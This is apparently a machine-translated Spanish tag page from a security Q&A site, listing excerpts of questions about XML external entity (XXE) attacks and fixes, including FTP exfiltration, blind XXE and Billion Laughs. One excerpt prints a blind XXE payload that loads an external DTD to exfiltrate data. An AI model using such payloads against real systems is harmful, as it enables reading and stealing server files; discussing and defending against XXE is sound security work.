Preguntas con etiqueta 'xxe'

preguntas con etiqueta
1
respuesta

Exfiltración a través de FTP utilizando XXE en un servidor Tomcat

Estoy intentando extraer datos binarios de un servidor Tomcat que usa SAXParser. Para mi servidor FTP, estoy usando esta fuente . Estoy hospedando dos DTD's en Github Gist. Estos son sus contenidos: XML base (lo que se envía al servidor):...
hecha 08.11.2018 - 15:18
0
respuestas

Servicio de SOAP ASP.NET XXE

¿Es posible realizar cualquier tipo de XXE en un servicio desarrollado utilizando el marco de servicio predeterminado C # SOAP? Lo pregunto porque cualquier tipo de carga útil XXE que intente agregar, incluso el encabezado XML, lo que agregué...
hecha 11.11.2018 - 22:51
1
respuesta

alternativas de ruta de ataque para XXE

Así que encontré un ataque ciego de Entidad Externa Xml (XXE) contra una infraestructura SAML mientras estaba involucrado con un cliente, pero me ha dado muchos intentos al intentar explotarlo antes. Puedo construir un simple XXE: <?xml ver...
hecha 07.06.2018 - 02:38
0
respuestas

Ejemplo de procesamiento de DTD inseguro en XmlSchema.Read

Según enlace y enlace el siguiente código es vulnerable al ataque de expansión DTD: var src = "?payload?"; TextReader tr = new StreamReader(src); XmlSchema schema = XmlSchema.Read(tr, null); ¿Podría alguien proporciona...
hecha 18.02.2018 - 22:21
0
respuestas

Inyección de Java XXE - Billion Laughs no funciona

Estoy intentando reproducir varios ataques xxe contra un servicio web java. Cuando intento reproducir "Billion Laughs" Siempre entiendo esto:    Excepción en el hilo "main" org.xml.sax.SAXParseException; número de línea:   1; número de c...
hecha 13.10.2016 - 04:33
0
respuestas

Resolviendo el defecto de la entidad externa XML en el servicio de auditoría de mensajes?

Una herramienta de análisis de código corporativo identificó una vulnerabilidad de seguridad en un servicio web que mi equipo mantiene. Identificó una vulnerabilidad XXE (entidad externa XML) en este servicio e hizo referencia a la hoja de truco...
hecha 30.11.2018 - 15:39
0
respuestas

javax.xml. * Explotación XXE

Durante un compromiso de Pentest, encontré una vulnerabilidad XXE en un servicio web SOAP escrito en Java, el sistema operativo es Windows Server y estoy tratando de demostrar qué tan grave es la vulnerabilidad. El problema es que solo puedo lee...
hecha 06.11.2018 - 21:47
1
respuesta

¿Por qué necesitamos dtd externo en XXE ciego?

Una carga útil XXE ciega adecuada es: - <?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "http://127.0.0.1/dtd.xml"> %sp; %param1; ]> <r>&exfil;</r> File stored on http://127....
hecha 02.11.2018 - 08:14
0
respuestas

inyección XXE en el nodo raíz del documento XML

Así que estoy en un compromiso y descubrí un punto de inyección XXE en un lugar peculiar en una aplicación ASP.NET que parece que no puedo entender. Uno de los parámetros posteriores controla a qué "formulario" se envía el resto de los datos, y...
hecha 29.06.2018 - 16:27
1
respuesta

¿Se puede llevar a cabo un ataque XXE desde un archivo docx? [cerrado]

¿Es posible XXE en una carga de archivos con archivos .docx?     
hecha 08.03.2018 - 11:05